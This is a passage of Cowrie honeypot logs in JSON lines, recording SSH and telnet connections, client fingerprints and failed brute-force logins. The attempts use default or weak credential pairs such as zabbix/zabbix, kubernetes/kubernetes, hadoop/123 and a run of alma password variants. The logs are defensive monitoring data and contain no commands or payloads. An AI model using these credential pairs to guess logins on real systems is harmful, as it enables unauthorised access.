ac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:52:27.870861Z","src_ip":"212.227.125.160","session":"ea62ec23feca"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-28T06:52:28.522341Z","src_ip":"212.227.125.160","session":"ea62ec23feca"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:29.740943Z","src_ip":"212.227.125.160","session":"ea62ec23feca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40690,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e773eb3f45a","protocol":"ssh","message":"New connection: 212.227.235.229:40690 (1.2.3.4:22) [session: 6e773eb3f45a]","sensor":"my-vps","timestamp":"2025-08-28T06:52:34.386783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:52:34.388409Z","src_ip":"212.227.235.229","session":"6e773eb3f45a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:52:34.640710Z","src_ip":"212.227.235.229","session":"6e773eb3f45a"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-28T06:52:35.399873Z","src_ip":"212.227.235.229","session":"6e773eb3f45a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:36.654407Z","src_ip":"212.227.235.229","session":"6e773eb3f45a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53682,"dst_ip":"1.2.3.4","dst_port":22,"session":"20dedd765eb3","protocol":"ssh","message":"New connection: 212.227.125.160:53682 (1.2.3.4:22) [session: 20dedd765eb3]","sensor":"my-vps","timestamp":"2025-08-28T06:52:44.218220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:52:44.219232Z","src_ip":"212.227.125.160","session":"20dedd765eb3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:52:44.434607Z","src_ip":"212.227.125.160","session":"20dedd765eb3"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-28T06:52:45.084041Z","src_ip":"212.227.125.160","session":"20dedd765eb3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:46.301780Z","src_ip":"212.227.125.160","session":"20dedd765eb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43400,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0508e12449b","protocol":"ssh","message":"New connection: 212.227.235.229:43400 (1.2.3.4:22) [session: d0508e12449b]","sensor":"my-vps","timestamp":"2025-08-28T06:52:50.896629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:52:50.897591Z","src_ip":"212.227.235.229","session":"d0508e12449b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:52:51.142380Z","src_ip":"212.227.235.229","session":"d0508e12449b"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-28T06:52:52.124610Z","src_ip":"212.227.235.229","session":"d0508e12449b"}
{"eventid":"cowrie.session.closed","duration":31.215354442596436,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:53.097466Z","src_ip":"8.222.212.69","session":"86e3ca29f229"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46431,"dst_ip":"1.2.3.4","dst_port":23,"session":"33926b3eea24","protocol":"telnet","message":"New connection: 212.227.235.229:46431 (1.2.3.4:23) [session: 33926b3eea24]","sensor":"my-vps","timestamp":"2025-08-28T06:52:53.168311Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:52:53.371623Z","src_ip":"212.227.235.229","session":"d0508e12449b"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":53962,"dst_ip":"1.2.3.4","dst_port":23,"session":"2e8ea2cad56e","protocol":"telnet","message":"New connection: 8.222.212.69:53962 (1.2.3.4:23) [session: 2e8ea2cad56e]","sensor":"my-vps","timestamp":"2025-08-28T06:52:54.572647Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34848,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7f3ee19fa9c","protocol":"ssh","message":"New connection: 212.227.125.160:34848 (1.2.3.4:22) [session: c7f3ee19fa9c]","sensor":"my-vps","timestamp":"2025-08-28T06:53:00.629962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:53:00.631005Z","src_ip":"212.227.125.160","session":"c7f3ee19fa9c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:53:00.894592Z","src_ip":"212.227.125.160","session":"c7f3ee19fa9c"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:01.556260Z","src_ip":"212.227.125.160","session":"c7f3ee19fa9c"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:02.774710Z","src_ip":"212.227.125.160","session":"c7f3ee19fa9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45352,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7b08bf37f33","protocol":"ssh","message":"New connection: 212.227.235.229:45352 (1.2.3.4:22) [session: c7b08bf37f33]","sensor":"my-vps","timestamp":"2025-08-28T06:53:07.143079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:53:07.144028Z","src_ip":"212.227.235.229","session":"c7b08bf37f33"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:53:07.397779Z","src_ip":"212.227.235.229","session":"c7b08bf37f33"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:09.140349Z","src_ip":"212.227.235.229","session":"c7b08bf37f33"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:10.397475Z","src_ip":"212.227.235.229","session":"c7b08bf37f33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51680,"dst_ip":"1.2.3.4","dst_port":22,"session":"d998cf056b9d","protocol":"ssh","message":"New connection: 212.227.125.160:51680 (1.2.3.4:22) [session: d998cf056b9d]","sensor":"my-vps","timestamp":"2025-08-28T06:53:17.074270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:53:17.080428Z","src_ip":"212.227.125.160","session":"d998cf056b9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:53:17.292669Z","src_ip":"212.227.125.160","session":"d998cf056b9d"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:18.168320Z","src_ip":"212.227.125.160","session":"d998cf056b9d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:19.389016Z","src_ip":"212.227.125.160","session":"d998cf056b9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51506,"dst_ip":"1.2.3.4","dst_port":22,"session":"08166426302f","protocol":"ssh","message":"New connection: 212.227.235.229:51506 (1.2.3.4:22) [session: 08166426302f]","sensor":"my-vps","timestamp":"2025-08-28T06:53:23.796113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:53:23.796827Z","src_ip":"212.227.235.229","session":"08166426302f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:53:24.044881Z","src_ip":"212.227.235.229","session":"08166426302f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:24.793340Z","src_ip":"212.227.235.229","session":"08166426302f"}
{"eventid":"cowrie.session.closed","duration":31.871365547180176,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:25.039571Z","src_ip":"212.227.235.229","session":"33926b3eea24"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:26.043743Z","src_ip":"212.227.235.229","session":"08166426302f"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":36082,"dst_ip":"1.2.3.4","dst_port":23,"session":"944ad572124a","protocol":"telnet","message":"New connection: 8.222.212.69:36082 (1.2.3.4:23) [session: 944ad572124a]","sensor":"my-vps","timestamp":"2025-08-28T06:53:26.726818Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62358,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b3bbff5a3ad","protocol":"ssh","message":"New connection: 212.227.235.229:62358 (1.2.3.4:22) [session: 8b3bbff5a3ad]","sensor":"my-vps","timestamp":"2025-08-28T06:53:26.988154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:53:27.203166Z","src_ip":"212.227.235.229","session":"8b3bbff5a3ad"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:53:27.361640Z","src_ip":"212.227.235.229","session":"8b3bbff5a3ad"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma","message":"login attempt [alma/alma] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:28.070193Z","src_ip":"212.227.235.229","session":"8b3bbff5a3ad"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma1","message":"login attempt [alma/alma1] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:29.227082Z","src_ip":"212.227.235.229","session":"8b3bbff5a3ad"}
{"eventid":"cowrie.session.closed","duration":35.18134427070618,"message":"Connection lost after 35 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:29.753889Z","src_ip":"8.222.212.69","session":"2e8ea2cad56e"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma123","message":"login attempt [alma/alma123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:30.384429Z","src_ip":"212.227.235.229","session":"8b3bbff5a3ad"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma1234","message":"login attempt [alma/alma1234] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:31.543009Z","src_ip":"212.227.235.229","session":"8b3bbff5a3ad"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma12345","message":"login attempt [alma/alma12345] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:33.105974Z","src_ip":"212.227.235.229","session":"8b3bbff5a3ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60796,"dst_ip":"1.2.3.4","dst_port":22,"session":"c40ca5cb29cf","protocol":"ssh","message":"New connection: 212.227.125.160:60796 (1.2.3.4:22) [session: c40ca5cb29cf]","sensor":"my-vps","timestamp":"2025-08-28T06:53:33.824815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:53:33.825676Z","src_ip":"212.227.125.160","session":"c40ca5cb29cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:53:34.050868Z","src_ip":"212.227.125.160","session":"c40ca5cb29cf"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:34.268573Z","src_ip":"212.227.235.229","session":"8b3bbff5a3ad"}
